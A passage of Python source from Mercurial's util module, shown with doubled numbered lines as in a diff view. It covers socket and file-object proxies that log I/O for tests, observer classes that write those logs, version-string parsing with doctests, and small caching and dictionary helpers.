554 r'read1', *args, **kwargs)
555
555
556 class observedbufferedinputpipe(bufferedinputpipe):
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
561 ``bufferedinputpipe`` aware of these operations.
562
562
563 This variation of ``bufferedinputpipe`` can notify observers about
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
565 ``read()`` and ``readline()``.
566 """
566 """
567 def _fillbuffer(self):
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
569
570 fn = getattr(self._input._observer, r'osread', None)
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
571 if fn:
572 fn(res, _chunksize)
572 fn(res, _chunksize)
573
573
574 return res
574 return res
575
575
576 # We use different observer methods because the operation isn't
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
577 # performed on the actual file object but on us.
578 def read(self, size):
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
579 res = super(observedbufferedinputpipe, self).read(size)
580
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
582 if fn:
583 fn(res, size)
583 fn(res, size)
584
584
585 return res
585 return res
586
586
587 def readline(self, *args, **kwargs):
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
591 if fn:
592 fn(res)
592 fn(res)
593
593
594 return res
594 return res
595
595
596 PROXIED_SOCKET_METHODS = {
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
597 r'makefile',
598 r'recv',
598 r'recv',
599 r'recvfrom',
599 r'recvfrom',
600 r'recvfrom_into',
600 r'recvfrom_into',
601 r'recv_into',
601 r'recv_into',
602 r'send',
602 r'send',
603 r'sendall',
603 r'sendall',
604 r'sendto',
604 r'sendto',
605 r'setblocking',
605 r'setblocking',
606 r'settimeout',
606 r'settimeout',
607 r'gettimeout',
607 r'gettimeout',
608 r'setsockopt',
608 r'setsockopt',
609 }
609 }
610
610
611 class socketproxy(object):
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
612 """A proxy around a socket that tells a watcher when events occur.
613
613
614 This is like ``fileobjectproxy`` except for sockets.
614 This is like ``fileobjectproxy`` except for sockets.
615
615
616 This type is intended to only be used for testing purposes. Think hard
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
617 before using it in important code.
618 """
618 """
619 __slots__ = (
619 __slots__ = (
620 r'_orig',
620 r'_orig',
621 r'_observer',
621 r'_observer',
622 )
622 )
623
623
624 def __init__(self, sock, observer):
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
626 object.__setattr__(self, r'_observer', observer)
627
627
628 def __getattribute__(self, name):
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
630 return object.__getattribute__(self, name)
631
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
633
634 def __delattr__(self, name):
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
636
637 def __setattr__(self, name, value):
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
639
640 def __nonzero__(self):
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
641 return bool(object.__getattribute__(self, r'_orig'))
642
642
643 __bool__ = __nonzero__
643 __bool__ = __nonzero__
644
644
645 def _observedcall(self, name, *args, **kwargs):
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
648 res = getattr(orig, name)(*args, **kwargs)
649
649
650 # Call a method on the observer of the same name with arguments
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
653 fn = getattr(observer, name, None)
654 if fn:
654 if fn:
655 fn(res, *args, **kwargs)
655 fn(res, *args, **kwargs)
656
656
657 return res
657 return res
658
658
659 def makefile(self, *args, **kwargs):
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
661 r'makefile', *args, **kwargs)
662
662
663 # The file object may be used for I/O. So we turn it into a
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
667 reads=observer.reads,
668 writes=observer.writes,
668 writes=observer.writes,
669 logdata=observer.logdata,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
670 logdataapis=observer.logdataapis)
671
671
672 def recv(self, *args, **kwargs):
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
674 r'recv', *args, **kwargs)
675
675
676 def recvfrom(self, *args, **kwargs):
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
678 r'recvfrom', *args, **kwargs)
679
679
680 def recvfrom_into(self, *args, **kwargs):
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
682 r'recvfrom_into', *args, **kwargs)
683
683
684 def recv_into(self, *args, **kwargs):
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
686 r'recv_info', *args, **kwargs)
687
687
688 def send(self, *args, **kwargs):
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
690 r'send', *args, **kwargs)
691
691
692 def sendall(self, *args, **kwargs):
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
694 r'sendall', *args, **kwargs)
695
695
696 def sendto(self, *args, **kwargs):
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
698 r'sendto', *args, **kwargs)
699
699
700 def setblocking(self, *args, **kwargs):
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
702 r'setblocking', *args, **kwargs)
703
703
704 def settimeout(self, *args, **kwargs):
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
706 r'settimeout', *args, **kwargs)
707
707
708 def gettimeout(self, *args, **kwargs):
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
710 r'gettimeout', *args, **kwargs)
711
711
712 def setsockopt(self, *args, **kwargs):
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
714 r'setsockopt', *args, **kwargs)
715
715
716 class baseproxyobserver(object):
716 class baseproxyobserver(object):
717 def _writedata(self, data):
717 def _writedata(self, data):
718 if not self.logdata:
718 if not self.logdata:
719 if self.logdataapis:
719 if self.logdataapis:
720 self.fh.write('\n')
720 self.fh.write('\n')
721 self.fh.flush()
721 self.fh.flush()
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 if self.logdataapis:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
728 else:
729 self.fh.write('%s> %s\n'
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
731 self.fh.flush()
732 return
732 return
733
733
734 # Data with newlines is written to multiple lines.
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
735 if self.logdataapis:
736 self.fh.write(':\n')
736 self.fh.write(':\n')
737
737
738 lines = data.splitlines(True)
738 lines = data.splitlines(True)
739 for line in lines:
739 for line in lines:
740 self.fh.write('%s> %s\n'
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
742 self.fh.flush()
743
743
744 class fileobjectobserver(baseproxyobserver):
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
747 logdataapis=True):
748 self.fh = fh
748 self.fh = fh
749 self.name = name
749 self.name = name
750 self.logdata = logdata
750 self.logdata = logdata
751 self.logdataapis = logdataapis
751 self.logdataapis = logdataapis
752 self.reads = reads
752 self.reads = reads
753 self.writes = writes
753 self.writes = writes
754
754
755 def read(self, res, size=-1):
755 def read(self, res, size=-1):
756 if not self.reads:
756 if not self.reads:
757 return
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
759 if res is None:
760 res = ''
760 res = ''
761
761
762 if size == -1 and res == '':
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
766 # Python 2 and 3 behavior. :(
767 return
767 return
768
768
769 if self.logdataapis:
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
771
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def readline(self, res, limit=-1):
774 def readline(self, res, limit=-1):
775 if not self.reads:
775 if not self.reads:
776 return
776 return
777
777
778 if self.logdataapis:
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
780
781 self._writedata(res)
781 self._writedata(res)
782
782
783 def readinto(self, res, dest):
783 def readinto(self, res, dest):
784 if not self.reads:
784 if not self.reads:
785 return
785 return
786
786
787 if self.logdataapis:
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
789 res))
790
790
791 data = dest[0:res] if res is not None else b''
791 data = dest[0:res] if res is not None else b''
792
792
793 # _writedata() uses "in" operator and is confused by memoryview because
793 # _writedata() uses "in" operator and is confused by memoryview because
794 # characters are ints on Python 3.
794 # characters are ints on Python 3.
795 if isinstance(data, memoryview):
795 if isinstance(data, memoryview):
796 data = data.tobytes()
796 data = data.tobytes()
797
797
798 self._writedata(data)
798 self._writedata(data)
799
799
800 def write(self, res, data):
800 def write(self, res, data):
801 if not self.writes:
801 if not self.writes:
802 return
802 return
803
803
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
804 # Python 2 returns None from some write() calls. Python 3 (reasonably)
805 # returns the integer bytes written.
805 # returns the integer bytes written.
806 if res is None and data:
806 if res is None and data:
807 res = len(data)
807 res = len(data)
808
808
809 if self.logdataapis:
809 if self.logdataapis:
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
810 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
811
811
812 self._writedata(data)
812 self._writedata(data)
813
813
814 def flush(self, res):
814 def flush(self, res):
815 if not self.writes:
815 if not self.writes:
816 return
816 return
817
817
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
818 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
819
819
820 # For observedbufferedinputpipe.
820 # For observedbufferedinputpipe.
821 def bufferedread(self, res, size):
821 def bufferedread(self, res, size):
822 if not self.reads:
822 if not self.reads:
823 return
823 return
824
824
825 if self.logdataapis:
825 if self.logdataapis:
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
826 self.fh.write('%s> bufferedread(%d) -> %d' % (
827 self.name, size, len(res)))
827 self.name, size, len(res)))
828
828
829 self._writedata(res)
829 self._writedata(res)
830
830
831 def bufferedreadline(self, res):
831 def bufferedreadline(self, res):
832 if not self.reads:
832 if not self.reads:
833 return
833 return
834
834
835 if self.logdataapis:
835 if self.logdataapis:
836 self.fh.write('%s> bufferedreadline() -> %d' % (
836 self.fh.write('%s> bufferedreadline() -> %d' % (
837 self.name, len(res)))
837 self.name, len(res)))
838
838
839 self._writedata(res)
839 self._writedata(res)
840
840
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
841 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
842 logdata=False, logdataapis=True):
842 logdata=False, logdataapis=True):
843 """Turn a file object into a logging file object."""
843 """Turn a file object into a logging file object."""
844
844
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
845 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
846 logdata=logdata, logdataapis=logdataapis)
846 logdata=logdata, logdataapis=logdataapis)
847 return fileobjectproxy(fh, observer)
847 return fileobjectproxy(fh, observer)
848
848
849 class socketobserver(baseproxyobserver):
849 class socketobserver(baseproxyobserver):
850 """Logs socket activity."""
850 """Logs socket activity."""
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
851 def __init__(self, fh, name, reads=True, writes=True, states=True,
852 logdata=False, logdataapis=True):
852 logdata=False, logdataapis=True):
853 self.fh = fh
853 self.fh = fh
854 self.name = name
854 self.name = name
855 self.reads = reads
855 self.reads = reads
856 self.writes = writes
856 self.writes = writes
857 self.states = states
857 self.states = states
858 self.logdata = logdata
858 self.logdata = logdata
859 self.logdataapis = logdataapis
859 self.logdataapis = logdataapis
860
860
861 def makefile(self, res, mode=None, bufsize=None):
861 def makefile(self, res, mode=None, bufsize=None):
862 if not self.states:
862 if not self.states:
863 return
863 return
864
864
865 self.fh.write('%s> makefile(%r, %r)\n' % (
865 self.fh.write('%s> makefile(%r, %r)\n' % (
866 self.name, mode, bufsize))
866 self.name, mode, bufsize))
867
867
868 def recv(self, res, size, flags=0):
868 def recv(self, res, size, flags=0):
869 if not self.reads:
869 if not self.reads:
870 return
870 return
871
871
872 if self.logdataapis:
872 if self.logdataapis:
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
873 self.fh.write('%s> recv(%d, %d) -> %d' % (
874 self.name, size, flags, len(res)))
874 self.name, size, flags, len(res)))
875 self._writedata(res)
875 self._writedata(res)
876
876
877 def recvfrom(self, res, size, flags=0):
877 def recvfrom(self, res, size, flags=0):
878 if not self.reads:
878 if not self.reads:
879 return
879 return
880
880
881 if self.logdataapis:
881 if self.logdataapis:
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
882 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
883 self.name, size, flags, len(res[0])))
883 self.name, size, flags, len(res[0])))
884
884
885 self._writedata(res[0])
885 self._writedata(res[0])
886
886
887 def recvfrom_into(self, res, buf, size, flags=0):
887 def recvfrom_into(self, res, buf, size, flags=0):
888 if not self.reads:
888 if not self.reads:
889 return
889 return
890
890
891 if self.logdataapis:
891 if self.logdataapis:
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
892 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
893 self.name, size, flags, res[0]))
893 self.name, size, flags, res[0]))
894
894
895 self._writedata(buf[0:res[0]])
895 self._writedata(buf[0:res[0]])
896
896
897 def recv_into(self, res, buf, size=0, flags=0):
897 def recv_into(self, res, buf, size=0, flags=0):
898 if not self.reads:
898 if not self.reads:
899 return
899 return
900
900
901 if self.logdataapis:
901 if self.logdataapis:
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
902 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
903 self.name, size, flags, res))
903 self.name, size, flags, res))
904
904
905 self._writedata(buf[0:res])
905 self._writedata(buf[0:res])
906
906
907 def send(self, res, data, flags=0):
907 def send(self, res, data, flags=0):
908 if not self.writes:
908 if not self.writes:
909 return
909 return
910
910
911 self.fh.write('%s> send(%d, %d) -> %d' % (
911 self.fh.write('%s> send(%d, %d) -> %d' % (
912 self.name, len(data), flags, len(res)))
912 self.name, len(data), flags, len(res)))
913 self._writedata(data)
913 self._writedata(data)
914
914
915 def sendall(self, res, data, flags=0):
915 def sendall(self, res, data, flags=0):
916 if not self.writes:
916 if not self.writes:
917 return
917 return
918
918
919 if self.logdataapis:
919 if self.logdataapis:
920 # Returns None on success. So don't bother reporting return value.
920 # Returns None on success. So don't bother reporting return value.
921 self.fh.write('%s> sendall(%d, %d)' % (
921 self.fh.write('%s> sendall(%d, %d)' % (
922 self.name, len(data), flags))
922 self.name, len(data), flags))
923
923
924 self._writedata(data)
924 self._writedata(data)
925
925
926 def sendto(self, res, data, flagsoraddress, address=None):
926 def sendto(self, res, data, flagsoraddress, address=None):
927 if not self.writes:
927 if not self.writes:
928 return
928 return
929
929
930 if address:
930 if address:
931 flags = flagsoraddress
931 flags = flagsoraddress
932 else:
932 else:
933 flags = 0
933 flags = 0
934
934
935 if self.logdataapis:
935 if self.logdataapis:
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
936 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
937 self.name, len(data), flags, address, res))
937 self.name, len(data), flags, address, res))
938
938
939 self._writedata(data)
939 self._writedata(data)
940
940
941 def setblocking(self, res, flag):
941 def setblocking(self, res, flag):
942 if not self.states:
942 if not self.states:
943 return
943 return
944
944
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
945 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
946
946
947 def settimeout(self, res, value):
947 def settimeout(self, res, value):
948 if not self.states:
948 if not self.states:
949 return
949 return
950
950
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
951 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
952
952
953 def gettimeout(self, res):
953 def gettimeout(self, res):
954 if not self.states:
954 if not self.states:
955 return
955 return
956
956
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
957 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
958
958
959 def setsockopt(self, res, level, optname, value):
959 def setsockopt(self, res, level, optname, value):
960 if not self.states:
960 if not self.states:
961 return
961 return
962
962
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
963 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
964 self.name, level, optname, value, res))
964 self.name, level, optname, value, res))
965
965
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
966 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
967 logdata=False, logdataapis=True):
967 logdata=False, logdataapis=True):
968 """Turn a socket into a logging socket."""
968 """Turn a socket into a logging socket."""
969
969
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
970 observer = socketobserver(logh, name, reads=reads, writes=writes,
971 states=states, logdata=logdata,
971 states=states, logdata=logdata,
972 logdataapis=logdataapis)
972 logdataapis=logdataapis)
973 return socketproxy(fh, observer)
973 return socketproxy(fh, observer)
974
974
975 def version():
975 def version():
976 """Return version information if available."""
976 """Return version information if available."""
977 try:
977 try:
978 from . import __version__
978 from . import __version__
979 return __version__.version
979 return __version__.version
980 except ImportError:
980 except ImportError:
981 return 'unknown'
981 return 'unknown'
982
982
983 def versiontuple(v=None, n=4):
983 def versiontuple(v=None, n=4):
984 """Parses a Mercurial version string into an N-tuple.
984 """Parses a Mercurial version string into an N-tuple.
985
985
986 The version string to be parsed is specified with the ``v`` argument.
986 The version string to be parsed is specified with the ``v`` argument.
987 If it isn't defined, the current Mercurial version string will be parsed.
987 If it isn't defined, the current Mercurial version string will be parsed.
988
988
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
989 ``n`` can be 2, 3, or 4. Here is how some version strings map to
990 returned values:
990 returned values:
991
991
992 >>> v = b'3.6.1+190-df9b73d2d444'
992 >>> v = b'3.6.1+190-df9b73d2d444'
993 >>> versiontuple(v, 2)
993 >>> versiontuple(v, 2)
994 (3, 6)
994 (3, 6)
995 >>> versiontuple(v, 3)
995 >>> versiontuple(v, 3)
996 (3, 6, 1)
996 (3, 6, 1)
997 >>> versiontuple(v, 4)
997 >>> versiontuple(v, 4)
998 (3, 6, 1, '190-df9b73d2d444')
998 (3, 6, 1, '190-df9b73d2d444')
999
999
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1000 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1001 (3, 6, 1, '190-df9b73d2d444+20151118')
1002
1002
1003 >>> v = b'3.6'
1003 >>> v = b'3.6'
1004 >>> versiontuple(v, 2)
1004 >>> versiontuple(v, 2)
1005 (3, 6)
1005 (3, 6)
1006 >>> versiontuple(v, 3)
1006 >>> versiontuple(v, 3)
1007 (3, 6, None)
1007 (3, 6, None)
1008 >>> versiontuple(v, 4)
1008 >>> versiontuple(v, 4)
1009 (3, 6, None, None)
1009 (3, 6, None, None)
1010
1010
1011 >>> v = b'3.9-rc'
1011 >>> v = b'3.9-rc'
1012 >>> versiontuple(v, 2)
1012 >>> versiontuple(v, 2)
1013 (3, 9)
1013 (3, 9)
1014 >>> versiontuple(v, 3)
1014 >>> versiontuple(v, 3)
1015 (3, 9, None)
1015 (3, 9, None)
1016 >>> versiontuple(v, 4)
1016 >>> versiontuple(v, 4)
1017 (3, 9, None, 'rc')
1017 (3, 9, None, 'rc')
1018
1018
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1019 >>> v = b'3.9-rc+2-02a8fea4289b'
1020 >>> versiontuple(v, 2)
1020 >>> versiontuple(v, 2)
1021 (3, 9)
1021 (3, 9)
1022 >>> versiontuple(v, 3)
1022 >>> versiontuple(v, 3)
1023 (3, 9, None)
1023 (3, 9, None)
1024 >>> versiontuple(v, 4)
1024 >>> versiontuple(v, 4)
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1025 (3, 9, None, 'rc+2-02a8fea4289b')
1026
1026
1027 >>> versiontuple(b'4.6rc0')
1027 >>> versiontuple(b'4.6rc0')
1028 (4, 6, None, 'rc0')
1028 (4, 6, None, 'rc0')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1029 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1030 (4, 6, None, 'rc0+12-425d55e54f98')
1031 >>> versiontuple(b'.1.2.3')
1031 >>> versiontuple(b'.1.2.3')
1032 (None, None, None, '.1.2.3')
1032 (None, None, None, '.1.2.3')
1033 >>> versiontuple(b'12.34..5')
1033 >>> versiontuple(b'12.34..5')
1034 (12, 34, None, '..5')
1034 (12, 34, None, '..5')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1035 >>> versiontuple(b'1.2.3.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1036 (1, 2, 3, '.4.5.6')
1037 """
1037 """
1038 if not v:
1038 if not v:
1039 v = version()
1039 v = version()
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1040 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1041 if not m:
1041 if not m:
1042 vparts, extra = '', v
1042 vparts, extra = '', v
1043 elif m.group(2):
1043 elif m.group(2):
1044 vparts, extra = m.groups()
1044 vparts, extra = m.groups()
1045 else:
1045 else:
1046 vparts, extra = m.group(1), None
1046 vparts, extra = m.group(1), None
1047
1047
1048 vints = []
1048 vints = []
1049 for i in vparts.split('.'):
1049 for i in vparts.split('.'):
1050 try:
1050 try:
1051 vints.append(int(i))
1051 vints.append(int(i))
1052 except ValueError:
1052 except ValueError:
1053 break
1053 break
1054 # (3, 6) -> (3, 6, None)
1054 # (3, 6) -> (3, 6, None)
1055 while len(vints) < 3:
1055 while len(vints) < 3:
1056 vints.append(None)
1056 vints.append(None)
1057
1057
1058 if n == 2:
1058 if n == 2:
1059 return (vints[0], vints[1])
1059 return (vints[0], vints[1])
1060 if n == 3:
1060 if n == 3:
1061 return (vints[0], vints[1], vints[2])
1061 return (vints[0], vints[1], vints[2])
1062 if n == 4:
1062 if n == 4:
1063 return (vints[0], vints[1], vints[2], extra)
1063 return (vints[0], vints[1], vints[2], extra)
1064
1064
1065 def cachefunc(func):
1065 def cachefunc(func):
1066 '''cache the result of function calls'''
1066 '''cache the result of function calls'''
1067 # XXX doesn't handle keywords args
1067 # XXX doesn't handle keywords args
1068 if func.__code__.co_argcount == 0:
1068 if func.__code__.co_argcount == 0:
1069 cache = []
1069 cache = []
1070 def f():
1070 def f():
1071 if len(cache) == 0:
1071 if len(cache) == 0:
1072 cache.append(func())
1072 cache.append(func())
1073 return cache[0]
1073 return cache[0]
1074 return f
1074 return f
1075 cache = {}
1075 cache = {}
1076 if func.__code__.co_argcount == 1:
1076 if func.__code__.co_argcount == 1:
1077 # we gain a small amount of time because
1077 # we gain a small amount of time because
1078 # we don't need to pack/unpack the list
1078 # we don't need to pack/unpack the list
1079 def f(arg):
1079 def f(arg):
1080 if arg not in cache:
1080 if arg not in cache:
1081 cache[arg] = func(arg)
1081 cache[arg] = func(arg)
1082 return cache[arg]
1082 return cache[arg]
1083 else:
1083 else:
1084 def f(*args):
1084 def f(*args):
1085 if args not in cache:
1085 if args not in cache:
1086 cache[args] = func(*args)
1086 cache[args] = func(*args)
1087 return cache[args]
1087 return cache[args]
1088
1088
1089 return f
1089 return f
1090
1090
1091 class cow(object):
1091 class cow(object):
1092 """helper class to make copy-on-write easier
1092 """helper class to make copy-on-write easier
1093
1093
1094 Call preparewrite before doing any writes.
1094 Call preparewrite before doing any writes.
1095 """
1095 """
1096
1096
1097 def preparewrite(self):
1097 def preparewrite(self):
1098 """call this before writes, return self or a copied new object"""
1098 """call this before writes, return self or a copied new object"""
1099 if getattr(self, '_copied', 0):
1099 if getattr(self, '_copied', 0):
1100 self._copied -= 1
1100 self._copied -= 1
1101 return self.__class__(self)
1101 return self.__class__(self)
1102 return self
1102 return self
1103
1103
1104 def copy(self):
1104 def copy(self):
1105 """always do a cheap copy"""
1105 """always do a cheap copy"""
1106 self._copied = getattr(self, '_copied', 0) + 1
1106 self._copied = getattr(self, '_copied', 0) + 1
1107 return self
1107 return self
1108
1108
1109 class sortdict(collections.OrderedDict):
1109 class sortdict(collections.OrderedDict):
1110 '''a simple sorted dictionary
1110 '''a simple sorted dictionary
1111
1111
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1112 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1113 >>> d2 = d1.copy()
1113 >>> d2 = d1.copy()
1114 >>> d2
1114 >>> d2
1115 sortdict([('a', 0), ('b', 1)])
1115 sortdict([('a', 0), ('b', 1)])
1116 >>> d2.update([(b'a', 2)])
1116 >>> d2.update([(b'a', 2)])
1117 >>> list(d2.keys()) # should still be in last-set order
1117 >>> list(d2.keys()) # should still be in last-set order
1118 ['b', 'a']
1118 ['b', 'a']
1119 '''
1119 '''
1120
1120
1121 def __setitem__(self, key, value):
1121 def __setitem__(self, key, value):
1122 if key in self:
1122 if key in self:
1123 del self[key]
1123 del self[key]
1124 super(sortdict, self).__setitem__(key, value)
1124 super(sortdict, self).__setitem__(key, value)
1125
1125
1126 if pycompat.ispypy:
1126 if pycompat.ispypy:
1127 # __setitem__() isn't called as of PyPy 5.8.0
1127 # __setitem__() isn't called as of PyPy 5.8.0
1128 def update(self, src):
1128 def update(self, src):
1129 if isinstance(src, dict):
1129 if isinstance(src, dict):
1130 src = src.iteritems()
1130 src = src.iteritems()
1131 for k, v in src:
1131 for k, v in src:
